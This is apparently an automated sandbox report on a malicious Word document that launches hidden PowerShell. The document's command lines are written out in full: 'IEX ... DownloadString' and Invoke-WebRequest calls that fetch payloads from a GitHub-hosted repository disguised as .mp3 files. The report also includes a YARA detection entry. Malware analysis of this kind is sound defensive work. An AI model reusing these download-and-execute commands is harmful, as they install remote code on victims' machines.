                                                                                                  Source-Age: 0
                                                                                                  2021-11-04 01:10:35 UTC3INData Raw: 63 64 20 24 45 6e 76 3a 54 65 6d 70 0a 49 6e 76 6f 6b 65 2d 57 65 62 52 65 71 75 65 73 74 20 2d 55 72 69 20 22 68 74 74 70 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 73 62 62 33 36 2f 73 74 76 2f 72 61 77 2f 6d 61 69 6e 2f 32 2e 6d 70 33 22 20 2d 4f 75 74 46 69 6c 65 20 22 74 65 6d 70 35 34 36 38 35 22 0a 49 6e 76 6f 6b 65 2d 57 65 62 52 65 71 75 65 73 74 20 2d 55 72 69 20 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 73 62 62 33 36 2f 73 74 76 2f 72 61 77 2f 6d 61 69 6e 2f 31 2e 6d 70 33 22 20 2d 4f 75 74 46 69 6c 65 20 22 65 6e 64 2e 76 62 73 22 0a 49 6e 76 6f 6b 65 2d 57 65 62 52 65 71 75 65 73 74 20 2d 55 72 69 20 22 68 74 74 70 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 73 62 62 33 36 2f 73 74 76 2f 72 61 77 2f 6d 61 69 6e 2f 33
                                                                                                  Data Ascii: cd $Env:TempInvoke-WebRequest -Uri "http://github.com/ssbb36/stv/raw/main/2.mp3" -OutFile "temp54685"Invoke-WebRequest -Uri "https://github.com/ssbb36/stv/raw/main/1.mp3" -OutFile "end.vbs"Invoke-WebRequest -Uri "http://github.com/ssbb36/stv/raw/main/3


                                                                                                  Code Manipulations

                                                                                                  Statistics

                                                                                                  CPU Usage

                                                                                                  Click to jump to process

                                                                                                  Memory Usage

                                                                                                  Click to jump to process

                                                                                                  High Level Behavior Distribution

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Behavior

                                                                                                  Click to jump to process

                                                                                                  System Behavior

                                                                                                  Analysis Process: WINWORD.EXE PID: 1912 Parent PID: 596

                                                                                                  General

                                                                                                  Start time:02:10:24
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                                                  Imagebase:0x13f490000
                                                                                                  File size:1423704 bytes
                                                                                                  MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  Chronological Activities

                                                                                                  Analysis Process: powershell.exe PID: 2784 Parent PID: 1912

                                                                                                  General

                                                                                                  Start time:02:10:26
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')
                                                                                                  Imagebase:0x13f860000
                                                                                                  File size:473600 bytes
                                                                                                  MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Yara matches:
                                                                                                  • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000002.00000002.435852554.00000000002D0000.00000004.00000020.sdmp, Author: Florian Roth
                                                                                                  Reputation:high

                                                                                                  Chronological Activities

                                                                                                  Disassembly

                                                                                                  Code Analysis

                                                                                                  Reset < >

                                                                                                    Analysis Process: powershell.exe PID: 2784 Parent PID: 1912 powershell.exeCOMMON

                                                                                                    Executed Functions

                                                                                                    Function 000007FF002606E5, Relevance: .2, Instructions: 181COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.441569843.000007FF00260000.00000040.00000001.sdmp, Offset: 000007FF00260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ff00260000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b541d933887fb8ca8344f62c8d51fdc89d948b37ddaca1c646c93dbe63f7713b
                                                                                                    • Instruction ID: 299ab62cf11e2b50f72cb64372ad3b5b68bdcc1b6b1861798accc7cb4d370934
                                                                                                    • Opcode Fuzzy Hash: b541d933887fb8ca8344f62c8d51fdc89d948b37ddaca1c646c93dbe63f7713b
                                                                                                    • Instruction Fuzzy Hash: AF41016194E7C64FE70397789CA46A27FB0AF17215B1E00E7D488CF0F3D9489999C322
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000007FF00261301, Relevance: .1, Instructions: 80COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.441569843.000007FF00260000.00000040.00000001.sdmp, Offset: 000007FF00260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ff00260000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fb662b233aaaf9b689b804bd809d1d3ac7b93a9fd57ff3d6539c96d4177ea8c2
                                                                                                    • Instruction ID: 6d01a30c7228dbda803bd29950242140ac5d0fd7e26da01451dae2eeac2e1510
                                                                                                    • Opcode Fuzzy Hash: fb662b233aaaf9b689b804bd809d1d3ac7b93a9fd57ff3d6539c96d4177ea8c2
                                                                                                    • Instruction Fuzzy Hash: B211C86245E3C44FD7138B789C64AA03FB0AF57204B0E05DBD8C8CF0A3E6186A69D363
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Non-executed Functions